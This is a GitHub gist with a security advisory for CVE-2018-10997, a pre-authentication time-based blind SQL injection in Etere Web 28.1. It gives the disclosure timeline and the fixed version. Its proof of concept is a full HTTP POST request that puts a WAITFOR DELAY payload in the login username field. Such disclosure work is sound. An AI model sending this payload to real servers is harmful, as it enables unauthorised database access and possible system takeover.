Skip to content

Instantly share code, notes, and snippets.

@dmblbc dmblbc/eteresqli
Last active Sep 20, 2018

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
eteresqli
Technicolor Security Office - Vulnerability Advisory
#######################################################################
#Title: Time-Based Blind SQL-Injection
#Product: Etere Web
#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx
#Vulnerable versions: Etere Web 28.1
#CVE: CVE-2018-10997
#Impact: critical
#Discoverer: Dion Bellemare
#######################################################################
-----------------------------------------------------------------------
[Description]
EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.
-----------------------------------------------------------------------
[Vendor of Product]
Etere Pte Ltd
-----------------------------------------------------------------------
[Affected Product Code Base]
EtereWeb - 28.1
-----------------------------------------------------------------------
[Attack Type]
Remote
-----------------------------------------------------------------------
[Impact Information Disclosure]
true
-----------------------------------------------------------------------
[CVE Impact Other]
An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control.
-----------------------------------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
-----------------------------------------------------------------------
[Proof Of Concept]
Target: http://etere.example.com/etereweb/
Target Parameters: txUserName (POST)
Target Parameters: txPassword (POST)
POST /etereweb/ HTTP/1.1
Host: etere.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://etere.example.com/etereweb/
Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 750
txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser=
-----------------------------------------------------------------------
[Solution]
Upgrade EtereWeb to version 28.1.20 or greater
-----------------------------------------------------------------------
[Advisory History]
2018-05-02 - Initial discovery and write-up of vuln advisory
2018-05-02 - Sent notification email to Etere contact
2018-05-03 - Received initial response from Etere
2018-05-08 - Sent email to suggest using PGP to encrypt email
2018-05-29 - Additional details of vuln provided to Etere
2018-05-31 - Etere responds that vuln is fixed in version 28.1.20
-----------------------------------------------------------------------
[Discoverer]
Dion Bellemare
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.